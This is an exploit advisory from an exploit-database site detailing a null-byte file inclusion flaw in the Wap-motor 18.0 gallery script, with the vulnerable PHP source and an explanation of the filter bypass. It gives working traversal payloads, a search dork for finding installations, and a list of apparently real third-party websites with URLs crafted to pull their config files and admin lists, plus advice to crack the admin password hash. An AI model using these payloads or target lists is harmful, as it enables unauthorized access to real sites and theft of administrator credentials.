WAP-Motor 18.0 File Inclusion

`===============================================================  
Wap-motor <= v. 18.0 (gallery.php) File Inclusion Vulnerability  
===============================================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
  
  
Product : Wap-motor  
Vesrion : v 18.0  
dork: "Powered by Wap-motor"  
site: http://visavi.net  
download: http://visavi.net/download/down.php?action=ob&did=wap-motor16&fid=MOTOR18.zip&  
  
  
In this version of vulnerability photo gallery script.  
Namely file  
  
http://[PATH]/gallery/gallery.php  
Let's code!  
  
PHP code:  
  
<?php   
require_once"../template/start.php";   
require_once"../template/regglobals.php";   
require_once"../template/config.php";   
require_once"../template/functions.php";   
  
$image=check($image);   
$ext = strtolower(substr($image, strrpos($image, '.') + 1));   
  
if($ext=="jpg" || $ext=="gif" || $ext=="png"){   
if($ext=="jpg"){$ext="jpeg";}   
  
$filename = BASEDIR."local/datagallery/$image";   
$filename = file_get_contents($filename);   
header('Content-Disposition: inline; filename="'.$image.'"');   
header("Content-type: image/$ext");   
header("Content-Length: ".strlen($filename));   
echo $filename;   
}   
?>  
  
file : ./template/regglobals.php  
  
  
...   
if (!ini_get('register_globals')) {   
while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;   
while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;   
while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value;   
}   
...   
foreach ($_GET as $check_url) {   
if ((eregi("<[^>]*script*\"?[^>]*>", $check_url)) || (eregi("<[^>]*object*\"?[^>]*>", $check_url)) ||   
(eregi("<[^>]*iframe*\"?[^>]*>", $check_url)) || (eregi("<[^>]*applet*\"?[^>]*>", $check_url)) ||   
(eregi("<[^>]*meta*\"?[^>]*>", $check_url)) || (eregi("<[^>]*style*\"?[^>]*>", $check_url)) ||   
(eregi("<[^>]*form*\"?[^>]*>", $check_url)) || (eregi("\([^>]*\"?[^)]*\)", $check_url)) ||   
(eregi("\"", $check_url)) || (eregi("\'", $check_url)) || (eregi("\./", $check_url)) ||   
(eregi("//", $check_url)) || (eregi("<", $check_url)) || (eregi(">", $check_url))) {   
  
header ("Location: ".BASEDIR."index.php?isset=403&".SID); exit;   
}   
...   
  
  
Here, the picture has become clearer to see the algorithm!  
Algorithm for action script when processing $ _GET [ 'image']:  
1. while (list ($ key, $ value) = each ($ _GET)) $ GLOBALS [$ key] = $ value;  
2. foreach ($ _GET as $ check_url) ...  
3. $ ext = strtolower (substr ($ image, strrpos ($ image, '.') + 1));  
4. header ( 'Content-Disposition: inline; filename ="'.$ image .'"');  
header ( "Content-type: image / $ ext");  
header ( "Content-Length:". strlen ($ filename));  
echo $ filename;  
  
That's what we have:  
  
http://[PATH]/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif  
  
  
Consider,  
image =% 00 - so we Nulle-byte stop processing eregi (). (Thanks for the article Elekt'u fatal mistake Php. Part Two.)  
.. / profil / Twost.prof% 00 - inkludim profile file (do not forget to change the admin username to Twost) and trims the same Nulle-byte extension  
. gif - but it substitute for the true value goes here  
header ( "Content-type: image / $ ext");  
  
The picture we have of course not appear, but it is not empty! Open the text editor and see the base of the account admin, you only have to decipher the hash!  
That's it!  
  
Example:  
  
http://mobile-world.dbhost.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://margarita.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://sat-tv.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://kod.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://fuckyou.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://bazooka.pp.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://metra.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://chermo.net.ru/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif  
http://sefan.us/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif  
http://landark.net.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
http://vseicq.org.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
  
# ~ - [ [ : Inj3ct0r : ] ]`